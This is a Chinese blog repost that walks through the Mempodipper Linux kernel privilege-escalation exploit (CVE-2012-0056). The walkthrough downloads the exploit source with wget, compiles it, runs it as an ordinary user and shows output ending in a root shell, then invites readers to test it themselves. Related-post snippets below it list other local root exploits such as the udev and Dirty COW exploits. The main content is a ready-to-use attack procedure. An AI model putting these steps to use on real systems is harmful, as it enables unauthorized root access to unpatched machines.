linux2.6.32漏洞,Linux 2.6.39 到 3.2.0 爆提权漏洞

最新推荐文章于 2023-05-05 11:16:47 发布
最新推荐文章于 2023-05-05 11:16:47 发布
阅读量460 收藏 1
点赞数
文章标签: linux2.6.32漏洞

1.下载漏洞利用文件

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r

3.0.0-12-generic

netcat@netcat:~$ cat /etc/issue

Ubuntu 11.10 n l

netcat@netcat:~$ uname -a

Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux

netcat@netcat:~$ id

uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行

netcat@netcat:~$ ./mempodipper

===============================

=          Mempodipper        =

=           by zx2c4          =

=         Jan 21, 2012        =

===============================

[+] Ptracing su to find next instruction without reading binary.

[+] Creating ptrace pipe.

[+] Forking ptrace child.

[+] Waiting for ptraced child to give output on syscalls.

[+] Ptrace_traceme’ing process.

[+] Error message written. Single stepping to find address.

[+] Resolved call address to 0×8049570.

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3012/mem in child.

[+] Sending fd 6 to parent.

[+] Received fd at 6.

[+] Assigning fd 6 to stderr.

[+] Calculating su padding.

[+] Seeking to offset 0×8049564.

[+] Executing su with shellcode.

sh-4.2#

来自  http://www.4shell.org/archives/2149.html

效果自测!

运营老高
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux提权总结8大类型,30多种方式
09-27
综上所述,Linux提权是一项复杂而多样的技术,涉及到系统的多个层面。了解这些提权技巧对于渗透测试人员和安全研究人员来说至关重要,同时也提醒系统管理员应时刻关注系统的安全性,及时修补漏洞,避免潜在的安全...
linux提权工具利用2.6内核漏洞
12-27
wunderbar_emporium-3.tgz linux提权工具 linux提权 2.6内核漏洞
linux 2.6.32 漏洞,Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC
weixin_39629269的博客
05-16 281
/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoCThe inode is a data structure in a Unix-style file system which describes a filesystemobject such as a file or a directory. Each inod...
linux 2.6.32 漏洞,Linux 2.6.393.2.0 提权漏洞,重现方法:wget
weixin_34828705的博客
05-16 876
Linux 2.6.393.2.0 提权漏洞,重现方法:wgetLinux 2.6.393.2.0 内核提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.ccc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成...
linux2.6内核本地提权
weixin_33912246的博客
01-03 692
 linux2.6内核本地提权 It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is...
linux-2.6.32.tar.gz
06-30
Linux内核详解:聚焦2.6.32版本》 在开源软件的世界里,Linux内核无疑是最为耀眼的一颗星。它以其强大的稳定性和灵活性,被广泛应用于各种操作系统和设备之中。当我们谈论"linux-2.6.32.tar.gz"时,我们实际上是...
linux2.6.32 内核纯净版
12-14
这个是linux2.6.32内核源码,没有做任何修改。可以放心下载。
linux2.6.32exp
08-29
Linux 2.6.32 是一个历史悠久的Linux内核版本,发布于2009年11月,由Linux之父Linus Torvalds主导。这个版本在Linux内核的发展历程中扮演了重要的角色,引入了许多新特性、优化和改进,提升了系统的稳定性和性能。...
linux2.6.32漏洞,Linux内核 2.6.22 < 3.9 权限提升漏洞 - Dirty COW - 知道创宇 Seebug 漏洞平台...
weixin_30481539的博客
05-16 441
### SummaryA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far i...
kernel-2.6.32-754.2.1.el6.x86_64.rpm
10-22
数据库安装必须的包;数据库安装必须的包;数据库安装必须的包;数据库安装必须的包;
centos6.10 RHSA-2019:0415漏洞修复(kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm)
03-08
修复方法如下: rpm -Uvh kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm 另外附上 rpm免费下载地址: https://rpmfind.net/linux/centos/6.10/updates/x86_64/Packages/kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm
linux 2.6 cpu漏洞,[转载]Linux kernel 2.6.x udev 本地安全漏洞
weixin_39635648的博客
05-12 167
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a 'cat /proc/net/netlink'# and set the first arg to thi...
关于Linux 2.6kernel udev 漏洞的检测及修补
qdujunjie的专栏
03-25 1337
转自:http://blog.chinaunix.net/uid-7387830-id-119510.html 最近闹的很凶的linux udev漏洞2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证!请大家必须打起12分精神。赶紧升级。ExtMa
Linux编译2.6.32
paul123456789io的博客
04-27 180
====================================== 6.32.7下载 ========================================== Linux内核下载 1.解压 tar zxvf *.tar 2.cp -r linux -2.6.*/ /usr/src (一定是这个目录下,不然报错) 3.make mrproper(检查有无不正确的.o文件依赖) 4.make clean 5.make menuconfig (一定要有这步,生成.config文..
linux 2.6.32.9 漏洞,Linux 2.6.393.2.0提权漏洞
weixin_32954401的博客
05-16 189
Linux 2.6.393.2.0 内核提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wgetcc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker ReportFedora 1...
Linux提权:从入门到放弃
热门推荐
云守护的专栏
03-23 1万+
转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,未经许可禁止转载 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了
Linux漏洞公告 | Linux内核漏洞CVE-2020-14386安全更新
最新发布
shanxun1012的专栏
05-05 356
升级-Centos Yum Security Update只更新安全补丁//只安装最安全的安全更新,忽略所有可能包含不安全新功能的包。
详细|Linux提权总结
st3pby的博客
11-06 8525
Linux提权总结
Mini2440嵌入式Linux内核定制教程(linux2.6.32
"Mini2440嵌入式Linux内核定制剖析教程,适用于Linux 2.6.32版本,旨在帮助开发者了解如何针对Mini2440开发板进行内核配置和编译。本教程由上海嵌入式家园提供,强调不必深入内核源码,而是学习如何配置内核选项,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值